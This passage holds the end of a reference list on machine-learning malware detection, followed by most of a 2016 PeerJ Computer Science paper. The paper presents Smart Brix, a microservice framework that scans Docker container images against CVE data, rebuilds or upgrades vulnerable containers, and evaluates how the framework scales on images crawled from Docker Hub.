Short-term load forecasts using LSTM networks. Energy Procedia 158:2922–2927 Innovative solutions for energy transitions DOI 10.1016/j.egypro.2019.01.952. Noor M, Abbas H, Shahid WB. 2018. Countering cyber threats for industrial applica- tions: an automated approach for malware evasion detection and analysis. Journal of Network and Computer Applications 103:249–261 DOI 10.1016/j.jnca.2017.10.004. Peiravian N, Zhu X. 2013. Machine learning for android malware detection using permission and API calls. In: 2013 IEEE 25th international conference on tools with artificial intelligence. Piscataway: IEEE, 300–305 DOI 10.1109/ICTAI.2013.53. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 22/23 https://peerj.com http://dx.doi.org/10.1109/CTC.2010.8 http://dx.doi.org/10.1016/j.jisa.2019.04.013 http://arXiv.org/abs/1905.01999 http://dx.doi.org/10.1016/j.jisa.2018.02.008 http://dx.doi.org/10.1016/j.future.2019.03.006 http://dx.doi.org/10.1016/j.egypro.2019.01.952 http://dx.doi.org/10.1016/j.jnca.2017.10.004 http://dx.doi.org/10.1109/ICTAI.2013.53 http://dx.doi.org/10.7717/peerj-cs.285 Pirscoveanu RS, Hansen SS, Larsen TMT, Stevanovic M, Pedersen JM, Czech A. 2015. ‘‘Analysis of Malware behavior: type classification using machine learning’’. In: International conference on cyber situational awareness, data analytics and assessment (CyberSA). Qiao Y, Yang Y, Ji L, He J. 2013. ’’Analyzing malware by abstracting the frequent itemsets in API call sequences’’. In: IEEE international conference on trust, security and privacy in computing and communications. Piscataway: IEEE. Rad BB, Masrom M, Ibrahim S. 2012. Camouflage in Malware: from encryption to metamorphism. International Journal of Computer Science and Network Security 12(8):74–83. Sami A, Yadegari B, Rahimi H, Peiravian N, Hashemi S, Hamzeh A. 2010. Malware detection based on mining API calls. In: SAC ’10. USA: MIT Press. Shamshirband S, Chronopoulos AT. 2019. A new malware detection system using a high performance-ELM method. In: IDEAS 19. Proceedings of the 23rd international database applications & engineering symposium. New York: Association for Comput- ing Machinery. Shamshirband S, Rabczuk T, Chau K. 2019. A survey of deep learning techniques: application in wind and solar energy resources. IEEE Access 7:164650–164666. Shiel I, O’Shaughnessy S. 2019. Improving file-level fuzzy hashes for malware variant classification. Digital Investigation 28:S88–S94 DOI 10.1016/j.diin.2019.01.018. Tian R, Islam R, Batten L, Versteeg S. 2010. Differentiating malware from cleanware using behavioural analysis. In: 2010 5th international conference on malicious and unwanted software. 23–30 DOI 10.1109/MALWARE.2010.5665796. Turpin A, Scholer F. 2006. User performance versus precision measures for simple search tasks. In: SIGIR ’06. Proceedings of the 29th annual international ACM SIGIR conference on research and development in information retrieval. New York: ACM, 11–18. Vinod P, Jain H, Golecha YK, Gaur MS, Laxmi V. 2010. ’’MEDUSA: MEtamorphic malware dynamic analysis using signature from API’’. In: Proceedings of the 3rd international conference on security of information and networks. Yazi AF, Çatak F, Gül E. 2019. Classification of methamorphic malware with deep learning(LSTM). In: 2019 27th signal processing and communications applications conference (SIU). 1–4 DOI 10.1109/SIU.2019.8806571. Catak et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.285 23/23 https://peerj.com http://dx.doi.org/10.1016/j.diin.2019.01.018 http://dx.doi.org/10.1109/MALWARE.2010.5665796 http://dx.doi.org/10.1109/SIU.2019.8806571 http://dx.doi.org/10.7717/peerj-cs.285 work_eiifbi6nnvfjdl2iphvrkxdkv4 ---- Submitted 7 March 2016 Accepted 12 May 2016 Published 13 June 2016 Corresponding author Johannes M. Schleicher, schleicher@dsg.tuwien.ac.at Academic editor Elisabetta Di Nitto Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.66 Copyright 2016 Schleicher et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Smart Brix—a continuous evolution framework for container application deployments Johannes M. Schleicher1, Michael Vögler1, Christian Inzinger2 and Schahram Dustdar1 1 Distributed Systems Group, TU Wien, Vienna, Austria 2 S.E.A.L—Software Evolution & Architecture Lab, University of Zürich, Zürich, Switzerland ABSTRACT Container-based application deployments have received significant attention in recent years. Operating system virtualization based on containers as a mechanism to deploy and manage complex, large-scale software systems has become a popular mechanism for application deployment and operation. Packaging application components into self- contained artifacts has brought substantial flexibility to developers and operation teams alike. However, this flexibility comes at a price. Practitioners need to respect numerous constraints ranging from security and compliance requirements, to specific regulatory conditions. Fulfilling these requirements is especially challenging in specialized domains with large numbers of stakeholders. Moreover, the rapidly growing number of container images to be managed due to the introduction of new or updated applications and respective components, leads to significant challenges for container management and adaptation. In this paper, we introduce Smart Brix, a framework for continuous evolution of container application deployments that tackles these challenges. Smart Brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics. Furthermore, it allows practitioners to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. We illustrate the feasibility of our approach by evaluating our framework using a case study from the smart city domain. We show that Smart Brix is horizontally scalable and runtime of the implemented analysis and compensation pipelines scales linearly with the number of container application packages. Subjects Adaptive and Self-Organizing Systems, Distributed and Parallel Computing, Software Engineering Keywords Containers, Container evolution, Container adaptation, DevOps, Infrastructure as Code INTRODUCTION In recent years, we have seen widespread uptake of operating system virtualization based on containers (Soltesz et al., 2007) as a mechanism to deploy and manage complex, large-scale software systems. Using containers, developers create self-contained images of application components along with all dependencies that are then executed in isolation on top of a container runtime (e.g., Docker: https://www.docker.com/, rkt: https://github.com/coreos/rkt, or Triton: https://www.joyent.com/). By packaging How to cite this article Schleicher et al. (2016), Smart Brix—a continuous evolution framework for container application deployments. PeerJ Comput. Sci. 2:e66; DOI 10.7717/peerj-cs.66 https://peerj.com mailto:schleicher@dsg.tuwien.ac.at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.66 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://www.docker.com/ https://github.com/coreos/rkt https://www.joyent.com/ http://dx.doi.org/10.7717/peerj-cs.66 application components into self-contained artifacts, developers can ensure that the same artifact is consistently used throughout the complete software release process, from initial testing to the final production deployment. This mechanism for application deployment has become especially popular with practitioners executing projects following DevOps (Hüttermann, 2012) principles. Based on the convergence of development and operations, DevOps advocates a high degree of automation throughout the software development lifecycle (e.g., to implement continuous delivery (Humble & Farley, 2010)), along with an associated focus on deterministic creation, verification, and deployment of application artifacts using Infrastructure as Code (IaC) (Nelson-Smith, 2013) techniques, such as Dock- erfiles (https://docs.docker.com/engine/reference/builder/) for containerized applications. These properties allow for straightforward implementation of immutable infrastructure deployments, as advocated by IaC approaches. Application container images are usually created using a layered structure so that common base functionality can be reused by multiple container images. Application-specific artifacts are layered on top of a base file system so that for subsequent updates only the modified layers need to be transferred among different deployment environments. Container engine vendors such as Docker and CoreOS provide public repositories where practitioners can share and consume container images, both base images for common Linux distributions (e.g., Ubuntu, CoreOS, CentOS, or Alpine) to subsequently add custom functionality, as well as prepared application images that can be directly used in a container deployment. Once uploaded to a repository, a container image is assigned a unique, immutable identifier that can subsequently be used to deterministically deploy the exact same application artifact throughout multiple deployment stages. By deploying each application component in its own container (https://docs.docker.com/engine/articles/dockerfile_best-practices/), practitioners can reliably execute multiple component versions on the same machine without introducing conflicts, as each component is executed in an isolated container. However, since each container image must contain every runtime dependency of the packaged application component, each of these dependency sets must be maintained separately. This leads to several challenges for practitioners. Over time, the number of active container images grows due to the introduction of new applications, new application components, and updates to existing applications and their components. This growing number of container images inherently leads to a fragmentation of deployed runtime dependencies, making it difficult for operators to ensure that every deployed container continues to adhere to all relevant security, compliance, and regulatory requirements. Whenever, for instance, a severe vulnerability is found in a common runtime dependency, practitioners either have to manually determine if any active container images are affected, or initiate a costly rebuild of all active containers, irrespective of the actual occurrence of the vulnerability. We argue that practitioners need a largely automated way to perform arbitrary analyses on all container images in their deployment infrastructure. Furthermore, a mechanism is required that allows for the enactment of customizable corrective actions on containers that fail to pass the performed analyses. Finally, in order to allow practitioners to deal with the possibly large number of container images, the overall approach should be able to adapt it’s deployment to scale out horizontally. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 2/24 https://peerj.com https://docs.docker.com/engine/reference/builder/ https://docs.docker.com/engine/articles/dockerfile_best-practices/ http://dx.doi.org/10.7717/peerj-cs.66 In this paper, we present Smart Brix, a framework for continuous evolution of container applications. Smart Brix integrates and unifies concepts of continuous integration, runtime monitoring, and operational analytics systems. Practitioners are able to define generic analytics and compensation pipelines composed of self-assembling processing components to autonomously validate and verify containers to be deployed. The framework supports both, traditional mechanisms such as integration tests, as well as custom, business-relevant processes, e.g., to implement security or compliance checks. Smart Brix not only manages the initial deployment of application containers, but is also designed to continuously monitor the complete application deployment topology to allow for timely reactions to changes (e.g., in regulatory frameworks or discovered application vulnerabilities). To enact such reactions to changes in the application environment, developers define analytics and compensation pipelines that will autonomously mitigate problems if possible, but are designed with an escalation mechanism that will eventually request human intervention if automated implementation of a change is not possible. To illustrate the feasibility of our approach we evaluate the Smart Brix framework using a case study from the smart city domain. We show that the runtime of the implemented analysis and compensation pipelines scales linearly with the number of analyzed application packages, and that it adds little overhead compared to container acquisition times. The remainder of this paper is structured as follows. In ‘Motivation’ we present a motivating scenario and relevant design goals for our framework. We present the Smart Brix framework in ‘The Smart Brix Framework,’ along with a detailed discussion of the framework components. In ‘Evaluation’ we evaluate our approach using a case study from the smart city domain. Related work is discussed in ‘Related Work’, followed by a conclusion and outlook for further research in ‘Conclusion.’ MOTIVATION In this paper, we base our discussion on a scenario containing a multi-domain expert network as created within URBEM (http://urbem.tuwien.ac.at), a research initiative of the city of Vienna and TU Wien. To tackle the emerging complexities that arise in the smart city domain, we introduced a novel Smart City Loop (Schleicher et al., 2015b), which is depicted in Fig. 1. This loop outlines a reactive system that enables stakeholders to make informed decisions based on the models and analyses of interdisciplinary domain experts who in turn can access the large amounts of data provided by smart cities. In URBEM, a network consists of experts in the domains of energy, mobility, mathematics, building physics, sociology, as well as urban and regional planning. URBEM aims to provide decision support for industry stakeholders to plan for the future of the city of Vienna and represents a Distributed Analytical Environment (DAE) (Schleicher et al., 2015c). The experts in this scenario rely on a multitude of different models and analytical approaches to make informed decisions based on the massive amounts of data that are available about the city. In turn, these models rely on a plethora of different tools and environments that lead to complex requirements in terms of providing the right runtime environment for them to operate. The used tools range from modern systems for data analytics and stream processing like Cassandra and Spark, to proprietary tools Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 3/24 https://peerj.com http://urbem.tuwien.ac.at http://dx.doi.org/10.7717/peerj-cs.66 Figure 1 Smart City Loop. developed by companies and research institutes with a large variance in specific versions and requirements to run them. Additionally, these domains have to deal with a broad range of different stakeholders and their specific security and compliance requirements. Models sometimes need to tailor their runtime environment to specific technology stacks to ensure compliance or to be able to access the data they need. Managing and satisfying all these requirements is a non-trivial task and a significant factor hindering broader adoption. Therefore, this environment offers an optimal case for the advantages that come with the use of container-based approaches. Operations teams that need to integrate these models no longer need to be concerned with runtime specifics. Experts simply build containers that can be deployed in the heterogenous infrastructures of participating stakeholders. However, several challenges remain. In URBEM the team of experts with their plethora of different models created over 250 different images that serve as the foundation for running containers. The models in these containers are fueled by data from several different Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 stakeholders in the scenario, ranging from research institutions in the City of Vienna to industry stakeholders in the energy and mobility domain. Each of them mandates a very distinct set of security and compliance requirements that need to be met in order to run them. These requirements in turn are subject to frequent changes and the containers need to be able to evolve along with them. Additionally, even though the container approach provides isolation from the host system it is still vital to ensure that the containers themselves are not compromised. This calls for means to check the systems running inside the container for known vulnerabilities, an issue that is subject to heavy and fast-paced change, again requiring according evolution. A recent study (http://www.banyanops.com/blog/analyzing- docker-hub/) shows that in the case of Docker, depending on the version of the images, more than 70% of the images show potential vulnerabilities, with over 25% of them being severe. This also begs the question of who is responsible for checking and fixing these vulnerabilities, the operations team or the experts who created them? Despite these security and compliance constraints, the ever-changing smart city domain itself makes it necessary for experts to stay on top of the novel toolsets that emerge in order to handle requirements stemming from topics like Big Data or IoT. This leads to a rapid creation and adaptation of models and their according containers, which in turn need be checked against these constraints again. Last but not least, these containers need to comply to certain non-functional requirements that arise from the specific situations they are applied in. This calls for the ability to constantly check containers against certain runtime metrics that need to be met in order to ensure that these systems are able to deliver their excepted results within stakeholder-specific time and resource constraints. All these factors lead to a complex environment that calls for an ability to easily adapt and evolve containers to their ever-changing requirements. Specifically, we identify the following requirements in the context of our domain: • The ability to check a large amount of heterogenous containers against an open set of evolving requirements. These requirements can be vulnerabilities, compliance constraints, functional tests, or any other metric of interest for the domain. • The ability to mitigate issues and evolve these containers based on the results from the previously mentioned checks. • An approach that is applicable in the context of operations management, while still enabling the participation of experts both for checking as well as evolution. • An approach that can be applied to existing deployments as well as utilized to test new ones. THE SMART BRIX FRAMEWORK In this section, we introduce the Smart Brix framework for continuos evolution of container-based deployments, which addresses the previously introduced requirements. We start with a framework overview, followed by a detailed description of all framework elements, and conclude with a comprehensive description of our proof of concept implementation including possible deployment variants. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 5/24 https://peerj.com http://www.banyanops.com/blog/analyzing-docker-hub/ http://www.banyanops.com/blog/analyzing-docker-hub/ http://dx.doi.org/10.7717/peerj-cs.66 Figure 2 Smart Brix framework overview. Framework rationales The Smart Brix framework follows the microservice (Newman, 2015) architecture paradigm and an overview of the main framework components is shown in Fig. 2. The framework is logically organized into four main facets, which group areas of responsibility. Each of these facets is composed of multiple components where each of these components represents a microservice. The components in the Analyzer and Compensation Facet are managed as self- assembling omponents (http://techblog.netflix.com/2014/06/building-netflix-playback- with-self.html), an approach we already successfully applied in previous work (Schleicher et al., 2015a). Each of these components follows the Command Pattern (Gamma et al., 1995) and consists of multiple processors that are able to accept multiple inputs and produce exactly one output. This functional approach enables a clean separation of concerns and allows us to decompose complex problems into manageable units. Figure 3 illustrates an example of auto-assembly within the Analyzer facet. We see a set of processors, where each processor is waiting for a specific type of input and clearly specifies the output it produces. The processors use a message-oriented approach to exchange input and output data, where each output and input is persistently available in the message queue and accessible by any processor. In this example we perform an analysis of a custom-built Debian-based container that hosts the Apache HTTPD server. There are two potential processors for the input Artifact, each of them able to handle a different container format. Since in our example the Artifact is a Docker Container, only the Docker Analyzer reacts and produces as output a Docker Image. In the next step there are two active processors, the Docker Base Image Analyzer and the Docker Package System Analyzer, both taking Docker Images as input. Since the Docker Base Image Analyzer cannot determine a base image for the given Docker Image, it produces no output. However, the Docker Package System Analyzer is able to determine that the image uses a DPKG-based package system and produces the according output. Now the DPKG Package Analyzer reacts by taking two inputs, the original Artifact as well as the DPKG output and inspects the Artifact via the Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 6/24 https://peerj.com http://techblog.netflix.com/2014/06/building-netflix-playback-with-self.html http://techblog.netflix.com/2014/06/building-netflix-playback-with-self.html http://dx.doi.org/10.7717/peerj-cs.66 Figure 3 Example of auto assembling processors within the analyzer facet. DPKG command to produce a Package List. In the last step of this auto-assembly example the Vulnerability Analyzer listens for a Package List and produces a List of Vulnerabilities. This enables a straightforward auto-assembly approach, where connecting previous outputs to desired inputs leads to an automatically assembled complex system consisting of simple manageable processors. A processor itself can be anything and is not bound to any specific functionality, so it can be created completely flexibel depending on the task at hand. This approach further eliminates the necessity of complex composition and organization mechanisms, enabling dynamic and elastic compositions of desired functionality, where processors can be added on demand at runtime. This enables the previously mentioned creation of open and flexible analytics and compensation pipelines based on this principle. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Figure 4 Confidence adaptation model escalation. Additionally, the components in the analyzer and compensation facets follow the principle of Confidence Elasticity, which means that a component or processor produces a result that is augmented with a confidence value (c ∈R,0≤c ≤1), with 0 representing no certainty and 1 representing absolute certainty about the produced result. This allows for the specification of acceptable confidence intervals for the framework, which augment the auto-assembly mechanism. The confidence intervals are provided as optional configuration elements for the framework. In case the provided confidence thresholds are not met, the framework follows an escalation model to find the next component or processor that is able to provide results with higher confidence until it reaches the point where human interaction is necessary to produce a satisfactory result (illustrated in Fig. 4). Each processor (pi) from the set of active processors (Pa) provides a confidence value ci. We define the overall confidence value of all active processors (ca) as ca= ∏ pi∈Pa ci. The compensation stops when ca meets the specified confidence interval of the framework or a processor represents a human interaction which has a confidence value of (ci=1). Smart Brix Manager In order to initiate a container evolution, the Smart Brix Manager is invoked via the Smart Brix API with the following parameters: (i) a set of Containers to be inspected with (ii) the necessary Credentials to analyze and evolve them, as well as an optional (iii) set of Artifacts necessary to compensate or analyze the containers. In a first step the Smart Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Brix Manager queries the Repository Manager to see if there are already known issues for the supplied containers. If any known issues are found, the Smart Brix Manager creates a corresponding compensation topic via the messaging infrastructure by publishing the container identifiers as well as the found issues. This represents an input that will subsequently be consumed by the corresponding Compensation Handlers and starts the previously described auto-assembly process in the Compensation Facet. If no issues were found, the Smart Brix Manager hands off the supplied Containers, Credentials and Artifacts to the Dependency Manager that is responsible for storing them in the Dependency Repository. As a next step, the Smart Brix Manager creates a corresponding analyzer topic via the messaging infrastructure and publishes the container identifiers to it. This generates an input that will be consumed by the corresponding Analyzers and starts another auto-assembly process in the Analyzer Facet. The Smart Brix Manager then listens to the created topic and waits for a response from the Analyzer Facet. If any analyzer responds, the manager checks the confidence value of the provided results against the configured confidence interval of the framework. If the results satisfy the interval it uses the Repository API to store them in the Analytics Repository. If the confidence intervals are not satisfied, it waits for a configured timeout for additional results to emerge. If this fails the framework escalates according to the principle of Confidence Elasticity and marks the containers as required for human interaction. If the confidence interval was met, the Smart Brix Manager initiates the previously mentioned auto-assembly process in the Compensation Facet. The Smart Brix Manager then listens to the created topic and waits for a response from any compensation handler. In case of a response, it checks the confidence values by applying the same approach as for the Analyzer Facet, and stores them as compensations into the Analytics Repository. A corresponding sequence diagram illustrating this is shown in Fig. 5. Furthermore, the Smart Brix Manager provides API endpoints to query the results of analytics and compensation processes, as well as the current status via container identifiers. Repository Manager The Repository Manager provides a repository for storing analytics results of all analyzed containers as well as their corresponding compensations. The Analytics Repository itself is a distributed key value store that enables Analyzers as well as Compensation Handlers to store information without being bound to a fixed schema. In addition, this enables the previously mentioned open extensibility of our auto-assembly approach by allowing every component to choose the required storage format. Finally, the Repository Manager provides a service interface to store and retrieve analytics and compensation information as well as an interface for querying information based on container identifiers or other attributes. Dependency Manager The Dependency Manager handles necessary credentials and artifacts that are needed for processing containers. The Dependency Manager provides a service interface that allows the Smart Brix Manager to store artifacts and credentials associated with specific containers. Additionally, it provides a mechanism for components in the Analyzer and Compensation Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Figure 5 Smart Brix Manager sequence diagram. Facets to retrieve the necessary credentials and artifacts for the corresponding container IDs. Finally, it acts as service registry for components in the Utility Facet and exposes them to the Compensation and Analyzer Facet. The Dependency Manager uses a distributed key value store for its Dependency Repository in order to store the necessary information. Utility Facet The general role of the Utility Facet is to provide supporting services for Analyzers, Compensation Handlers, and Managers of the framework. Components in the Utility Facet register their offered services via the Dependency Manager. This provides an open and extensible approach that allows to incorporate novel elements in order to address changing requirements of container evolution. In our current architecture, the Utility Facet contains three components. First, a Vulnerability Hub, which represents a service interface that allows Analyzers as well as Compensation Handlers to check artifacts for vulnerabilities. The Vulnerability Hub can either utilize public repositories (e.g., the National Vulnerability Database: https://nvd.nist.gov/), or any other open or proprietary Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 10/24 https://peerj.com https://nvd.nist.gov/ http://dx.doi.org/10.7717/peerj-cs.66 vulnerability repository. The second component is a Compliance Hub that allows to check for any compliance violations in the same way the Vulnerability Hub does. This is an important element in heterogenous multi-stakeholder environments, where compliance to all specified criteria must be ensured at all times. The last element is a Metric Hub, which allows to check artifacts for certain relevant metrics in order to ensure relevant Quality of Service constraints for containers. Analyzers The task of the components within the Analyzer Facet is to test containers for potential vulnerabilities, compliance violations or any other metrics. The facet is invoked by the Smart Brix Manager, which triggers an auto-assembly process for the given containers that should be analyzed. The Analyzer Facet can contain components for the most prominent container formats like Docker or Rkt, but due to the fact that we utilize the auto-assembly approach, we are able to integrate new container formats as they emerge. For analyzing a container an analyzer follows three basic steps: (i) Determine the base layer of the container in order to know how to access the package list; (ii) Determine the list of installed packages including their current version; (iii) Match the list of installed packages against a set of vulnerabilities, issues, or compliance constraints in order to determine the set of problems. Every step can follow a different set of strategies to analyze a container represented as different processors, each of them with a specific confidence value. Possible processors for these steps are: (i) Base Image Processors, which try to determine the base layer of a container by matching their history against known base image IDs; (ii) Similarity Processors that try to select a base layer based on similarities in the history of the container with known containers by performing actions like collaborative filtering and text mining; (iii) Convention Processors that try to determine the base layer by trying common commands and checking their results; (iv) Human Provided Processors, which are human experts that manually analyze a container. In order to access the containers and to perform analytics, the components within the Analyzer Facet interact with the Dependency Manager. The manager provides them with the necessary credentials for processing containers. Once the analyzers have processed a container, they publish the results, which are augmented with the confidence value, to the corresponding topic where the Smart Brix Manager carries on as previously described. Compensation Handlers The components in the Compensation Facet generate potential compensations for containers that have been previously identified by the Analyzers. Like the Analyzers, the Compensation Handlers are invoked by the Smart Brix Manager, which starts an auto-assembly process for the containers with problems that should be compensated. We provide components for the most prominent container formats, with the ability to extend the list as new formats emerge. The compensation handlers follow three basic steps: (i) Apply a compensation strategy for the container and the identified problem; (ii) Verify if the compensation strategy could be applied by rebuilding or restarting the container; (iii) Verify that the problems could be eliminated or reduced. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.66 Again, every step can utilize a set of different processors, each of them with a specific confidence value, which represent different strategies. Possible processors are: (i) Container Processors, which try to use the base image’s package manager to upgrade packages with identified vulnerabilities. (ii) Image Processors that try to build a new image without the vulnerabilities; (iii) Similarity Processor that try to compensate via applying steps from similar containers that do not show these vulnerabilities; (iv) Human Provided Processors, which are human experts that manually compensate a container. The Compensation Handlers interact with the Dependency Manager in a similar way like the Analyzers to retrieve the necessary credentials to operate. As Image Processors and Similarity Processors build new images in order to compensate, they can request the necessary artifacts associated with an image to be able build them. Implementation We created a proof of concept prototype of our framework based on a set of RESTful microservices implemented in Ruby. Each component that exposes a service interface relies on the Sinatra (http://www.sinatrarb.com/) web framework. The Repository Manager and the Dependency Manager utilize MongoDB (https://www.mongodb.org/) as their storage backend, which enables the previously described distributed, open, and extendable key value store for their repositories. We implemented a Vulnerability Hub that uses a SQLite (https: //www.sqlite.org/) storage backend to persist vulnerabilities in a structured format. It holds the recent data from the National Vulnerability Database (NVD; https://nvd.nist.gov/), specifically the listed Common Vulnerabilities and Exposures (CVEs). This CVE Hub allows to import the CVEs posted on NVD, stores them in its repository, and allows to search for CVEs by vulnerable software name as well as version via its Sinatra-based REST interface. To enable the auto-assembly mechanism for each processor within each component in the Analyzer and Compensation Facet, we use a message-oriented middleware. Specifically, we utilize RabbitMQ’s (https://www.rabbitmq.com/) topic and RPC concepts, by publishing each output and listening for its potential inputs on dedicated topics. We implemented a Docker Analyzer component with a Base Image Processor and a Convention Processor-based strategy. The Docker Analyzer first tries to determine the operating system distribution of the container by analyzing its history. Specifically, it uses the Docker API to generate the history for the container and selects the first layer’s ID, which represents the base layer. It then matches this layer against a set of known layer IDs, which matches corresponding operating system distributions to determine which command to use for extracting the package list. If a match is found, it uses the corresponding commands to determine the package list. If the determined operating system is Ubuntu or Debian, it will use dpkg to determine the package list. If it was CentOS, yum is used, and if it was Alpine, apk. After parsing the package command output into a processable list of packages, it checks each package name and version by using the CVE Hub via its REST interface. When this step is finished the Analyzer publishes the list of possible vulnerabilities, including analyzed packages along with several runtime metrics. In case the base image strategy fails, the Docker Analyzer tries to determine the base layer including the corresponding operating system via a convention processor. Specifically, it test if the image contains any of Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 12/24 https://peerj.com http://www.sinatrarb.com/ https://www.mongodb.org/ https://www.sqlite.org/ https://www.sqlite.org/ https://nvd.nist.gov/ https://www.rabbitmq.com/ http://dx.doi.org/10.7717/peerj-cs.66 the known package managers. Based on the results the analyzer determines the distribution flavor and continues as described above. We further implemented a Docker Compensation Handler with a Container Processor and an Image Processor based compensation strategy. The Container Processor tries to upgrade the container using the operating system distribution’s package manager. After this operation succeeds, it checks if the number of vulnerabilities are reduced, by comparing the new version of packages against the CVE Hub. If this was the case it augments the results with a confidence value based on the percentage of fixed vulnerabilities and publishes the results. The Image Processor tries to fix the container by generating a new container manifest (e.g., Dockerfile). More precisely, it uses the Docker API to generate the image history and then derives a Dockerfile from this history. After this step, the Image Processor exchanges the first layer of the Dockerfile with the newest version of its base image. In cases where it cannot uniquely identify the correct Linux flavor, it generates multiple Dockerfiles, for example one for Ubuntu and one for Debian. It then checks the Dockerfiles’ structure for potential external artifacts. Specifically, it searches for any COPY or ADD commands that are present in the Dockerfile. If this is the case, it contacts the Dependency Manager and attempts to retrieve the missing artifacts. Once this is finished the Image Processor tries to rebuild the image based on the generated Dockerfile. After this step is finished, the Image Processor again checks the new list of packages against the CVE Hub, and if it could improve the state of the image it publishes the results with the corresponding confidence value. The prototype implementation is available online and can be found at https://bitbucket.org/jomis/smartbrix/. Deployment modes The Smart Brix Framework provides a container for each facet and therefore supports deployment on heterogeneous infrastructures. The framework enables wiring of components and aspects via setting the container’s environment variables, enabling dynamic setups. We distinguish between two fundamental deployment modes, Inspection Mode and Introspection Mode. Inspection Mode The Inspection Mode allows the framework to run in a dedicated inspection and com- pensation setting. In this mode the framework ideally runs exclusively without any other containers and utilizes the full potential of the host systems. This means that the Smart Brix Managers wait until they receive an explicit request to analyze and compensate an artifact. Introspection Mode The Introspection Mode allows the framework to run in an active container setup. In this mode the framework constantly watches deployed containers via the Smart Brix Manager. The Manager can be provided with a list of containers to watch via a configuration setting. This provided list of containers is then analyzed and compensated. If no container lists are supplied, the Manager watches all running containers on the platform. In this case it initiates a check whenever new images are added, an image of a running container changes, or new vulnerabilities are listed in the CVE Hub. Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 13/24 https://peerj.com https://bitbucket.org/jomis/smartbrix/ http://dx.doi.org/10.7717/peerj-cs.66 Figure 6 Evaluation Setup of Smart Brix running in inspection mode. EVALUATION Setup For our evaluation we used the following setup. We provisioned three instances in our private OpenStack cloud, each with 7.5 GB of RAM and 4 virtual CPUs. Each of these instances was running Ubuntu 14.04 LTS with Docker staged via docker-machine (https: //docs.docker.com/machine/install-machine/). For our evaluation we choose the inspection deployment variant of our framework in order to stress-test the system without other inter- fering containers. We deployed one manager container representing the Management Facet, as well as two utility containers containing the CVE Hub and the Messaging Infrastructure on one instance. We then distributed 12 analyzer containers with 12 compensation containers over the remaining two instances. Additionally, we deployed a cAdvisor (https: //github.com/google/cadvisor) container on every instance to monitor the resource usage and performance characteristics of the running containers. Figure 6 shows an overview of the deployed evaluation setup. Experiments Since we currently only have around 250 images in our URBEM setting, we extended the number of images to be evaluated. In order to get a representative set of heterogenous images we implemented a small service to crawl Docker Hub (https://hub.docker.com/). The Docker Hub is a public repository of Docker container images of different flavors. These images range from base images, like Ubuntu and CentOS etc., to more complex images like Cassandra and Apache Spark. We utilized the search function of the Hub to collect a set of 4,000 images ordered by their popularity (number of pulls and number of Schleicher et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.66 14/24 https://peerj.com https://docs.docker.com/machine/install-machine/ https://docs.docker.com/machine/install-machine/ https://github.com/google/cadvisor https://github.com/google/cadvisor https://hub.docker.com/ http://dx.doi.org/10.7717/peerj-cs.66 stars), which ensures that we focus on a set with a certain impact. We then extracted the name and the corresponding pull commands along with the latest tag to form the URI of the image. This set of 4,000 URIs represented the source for our experiments, which was then split into 3 sets containing 250, 500, and 1,000 images to be tested. Analyzer experiments We started our experiments with a focus on the Analyzer Facet of the framework. First, we started the analyzer containers on one instance and started our tests with the 250 image set. After the run finished we repeated it with the 500 and 1,000 image set. After the tests with one instance, we repeated the experiments with two instances where each run was repeated three times. During the tests we constantly monitored cAdvisor to ensure that the instances were not fully utilized in order to ensure this would not skew results. The focus of our experiments were not the performance characteristics of our framework, in terms of cpu, memory or disk usage, which is why we used cAdvisor only as a monitor to rule out overloading our infrastructure. We also did not utilize any storage backend for cAdvisor since this has shown to be a significant overhead which in turn would have skewed our results. After the runs had finished we evaluated the vulnerability results. The analyzers logged the analyzed images, their base image flavor (e.g., Ubuntu, Debian etc.), processing time to analyze the image, pull time to get the image from the DockerHub as well as the overall runtime, number of packages, size of the image, and number of vulnerabilities. Over all our experiments the analyzers showed that around 93% of the analyzed images have vulnerabilities. This mainly stems from the fact that our implemented analyzers have a very high sensitivity and check for any potentially vulnerable software with any potentially vulnerable configuration. However, this does not necessarily mean that the specific combination of software and configuration in place shows the detected vulnerability. If we only take a look at the images with a high severity according to their CVSS (https://nvd.nist.gov/cvss.cfm) score, around 40% show to be affected which is conclusive with recent findings (http://www.banyanops.com/blog/analyzing-docker-hub/). These results underline the importance to implement the measures proposed by our framework. However, the focus of our work and the aim of our experiments was not to demonstrate the accuracy of the implemented vulnerability detection, but the overall characteristics of our framework, which we discuss in the remainder of this section. We first compared the overall runtime of our analyzers, specifically the difference for one instance vs two instance deployments, the results are shown in Fig. 7. Based on the results we see that our approach can be horizontally scaled over two nodes leading to a performance improvement of around 40%. The fact that in our current evaluation setting we were not able to halve the overall 